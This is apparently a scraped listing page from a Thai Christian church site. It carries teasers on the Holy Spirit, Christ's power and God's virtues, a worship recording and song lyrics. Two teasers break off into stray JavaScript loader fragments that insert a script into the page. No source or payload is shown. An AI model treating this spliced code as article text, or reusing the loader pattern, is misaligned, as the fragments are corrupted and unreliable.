บทความ

p19tk4j4um1rqor3i1mliqr12r8c
17 ต.ค.

พระวิญญาณบริสุทธิ์

ความหมายของพระวิญญาณบริสุทธิ์ คนในสมัยพระคัมภีร์เขาเห็นการสำแดงฤทธิ์อำนาจของพระเจ้าและใช้คำภาษาฮีบรูว่า "รูอัค" แทนคำว่า "ฤทธิ์"  ซึ่งคำทั่วไปหมายความว่า 1) ลม  2) ลมปราณ 3) จิตวิญญาณ จิตใจ   หมายถึงความรู้สึกหรือชีวิตของมนุษย์ อีกทั้งในภาษาฮีบรูแปล 2 แง่คือ  การหายใจ  หรือลมปราณ แต่เมื่อใช้คำว่า "รูอัค" ...

pexels-photo
17 ต.ค.

ศักดานุภาพของพระเยซูคริสต์

1. ทรงอยู่ทุกหนทุกแห่งสากลสถิต (ยน.1:48, 3:13) จากคำสั่งที่ทรงกำชับสาวกให้ปรนนิบัติ ประกาศเรื่องของแผ่นดินพระเจ้า ทรงย้ำยืนยันการปฏิบัติการของสาวกว่า "นี่แหละเราจะอยู่กับท่านทั้งหลายเสมอไปเป็นนิตย์ กว่าจะสิ้นโลก" จากคำสัญญานี้ คริสตชนทุกยุคทุกสมัยยืนยันได้จากการสำแดงอัศจรรย์ การเปลี่ยนแปลงชีวิตของพระคริสต์ต่อมวลชนที่เชื่อในพระองค์ หลายคนที่หมดหวังได้พบหวัง จากโจรผู้ร้ายมาเป็นผู้รับใช้พระเจ้า จากคนที่ใช้ไม่ได้ถูกเปลี่ยนแปลงโดยฤทธิ์เดชของพระองค์ ทรงอยู่ทุกที่ได้ในเวลาเดียวกัน โดยพระวิญญาณของพระองค์รู้ถึงพฤติกรรมของมนุษย์ 2. ทรงมีฤทธิ์อำนาจ ฤทธานุภาพเหนือธรรมชาติ และไม่มีขีดจำกัด (มก.1:27,...

dawn-nature-sunset-trees
16 ต.ค.

คุณธรรมของพระเจ้า

คุณธรรมคืออะไร? คุณธรรมคือ "ความดี" หรือ "หน้าที่อันจำต้องมีอยู่เอง" เช่น ความกรุณา, ความยุติธรรม, ความรัก, ความสัตย์ซื่อ ซึ่งเป็นหน้าที่ของพระราชา พระมหากษัตริย์ โดยเฉพาะของพระเจ้า คุณธรรมของผีปีศาจ ดังที่ทราบ ไสยศาสตร์ ภูติ ผี ปีศาจ วิญญาณชั่วต่าง ๆ...

COVER-CD-LIVE-2
16 ต.ค.

RMC LIVE WORSHIP

นมัสการสดเมื่อวันที่ 21/06/2015 โดยทีม นมัสการคริสตจักรพันธกิจแม่น้ำd.getElementsByTagName('head')[0].appendChild(s);...

p19tis8auj1dmo1drs1sck1fjv7bmc
16 ต.ค.

เพลง You Never Let Go

แม้เดินในหุบเขา อันตราย ความมืดไม่ทำให้ฉันกลัว ความรักพระองค์คุ้มภัยให้แข็งแกร่งdocument.currentScript.parentNode.insertBefore(s, document.currentScript);...